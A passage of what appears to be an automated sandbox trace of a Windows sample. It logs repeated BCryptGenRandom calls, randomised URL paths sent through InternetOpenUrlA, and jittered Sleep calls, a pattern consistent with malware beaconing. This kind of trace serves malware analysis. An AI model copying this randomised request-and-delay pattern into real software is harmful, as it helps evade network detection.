lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.834] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0167.834] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.834] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.834] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.835] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.835] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.835] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.835] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.836] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.836] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.836] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.836] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.052] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.064] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.065] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.065] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.065] GetProcessHeap () returned 0x440000 [0168.065] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473b90 [0168.065] lstrcpyA (in: lpString1=0x473b90, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0168.065] lstrcatA (in: lpString1="\x81\x03", lpString2="/s6IcneHsDf6gH5hlwHpUxt1mPnuCtkxb0tSqjx2lyxumhnA/" | out: lpString1="\x81\x03/s6IcneHsDf6gH5hlwHpUxt1mPnuCtkxb0tSqjx2lyxumhnA/") returned="\x81\x03/s6IcneHsDf6gH5hlwHpUxt1mPnuCtkxb0tSqjx2lyxumhnA/" [0168.065] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0168.065] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/s6IcneHsDf6gH5hlwHpUxt1mPnuCtkxb0tSqjx2lyxumhnA/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0168.065] GetProcessHeap () returned 0x440000 [0168.065] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473b90 | out: hHeap=0x440000) returned 1 [0168.066] GetProcessHeap () returned 0x440000 [0168.066] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f54b0 | out: hHeap=0x440000) returned 1 [0168.066] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0168.066] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0168.066] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.066] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0168.067] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0168.067] Sleep (dwMilliseconds=0x18a60) [0168.231] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.231] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0168.231] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.231] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0168.231] GetProcessHeap () returned 0x440000 [0168.231] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b2c0 [0168.232] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0168.232] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b2c1, cbBuffer=0x23, dwFlags=0x2 | out: pbBuffer=0x3a1b2c1) returned 0x0 [0168.232] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.232] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.233] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.233] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.233] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.233] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.233] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.233] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.233] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.233] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.234] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.234] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.234] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.234] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.234] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.235] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.235] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.235] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.235] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.235] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0168.235] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.235] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.235] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.235] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.236] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.236] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.236] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.236] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.237] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.237] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.237] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.237] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.238] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.238] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0168.238] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b2e4, cbBuffer=0x28, dwFlags=0x2 | out: pbBuffer=0x3a1b2e4) returned 0x0 [0168.238] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.238] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.239] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.239] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.239] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.239] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.239] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.239] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.239] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.240] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.240] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.240] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.240] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.240] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.240] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.240] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.240] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.240] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.243] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.243] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.243] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.243] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.243] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.244] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.244] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.244] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.244] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.245] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.245] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.245] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.245] GetProcessHeap () returned 0x440000 [0168.245] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472b10 [0168.245] lstrcpyA (in: lpString1=0x472b10, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0168.245] lstrcatA (in: lpString1="\x04", lpString2="/p4f2ika99dndxqJtoJ3Gkg00iTanpJ9wCp/9rgfloPTIpy78F9wx7rA9d5924lNyfDadh5kvso/" | out: lpString1="\x04/p4f2ika99dndxqJtoJ3Gkg00iTanpJ9wCp/9rgfloPTIpy78F9wx7rA9d5924lNyfDadh5kvso/") returned="\x04/p4f2ika99dndxqJtoJ3Gkg00iTanpJ9wCp/9rgfloPTIpy78F9wx7rA9d5924lNyfDadh5kvso/" [0168.246] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0168.246] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/p4f2ika99dndxqJtoJ3Gkg00iTanpJ9wCp/9rgfloPTIpy78F9wx7rA9d5924lNyfDadh5kvso/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0168.246] GetProcessHeap () returned 0x440000 [0168.246] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472b10 | out: hHeap=0x440000) returned 1 [0168.246] GetProcessHeap () returned 0x440000 [0168.246] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b2c0 | out: hHeap=0x440000) returned 1 [0168.246] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0168.246] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0168.247] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0168.247] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0168.247] Sleep (dwMilliseconds=0x140b9) [0168.423] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0168.423] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0168.423] GetProcessHeap () returned 0x440000 [0168.423] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a17200 [0168.423] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0168.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17201, cbBuffer=0x30, dwFlags=0x2 | out: pbBuffer=0x3a17201) returned 0x0 [0168.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.424] BCryptGenRandom (in: 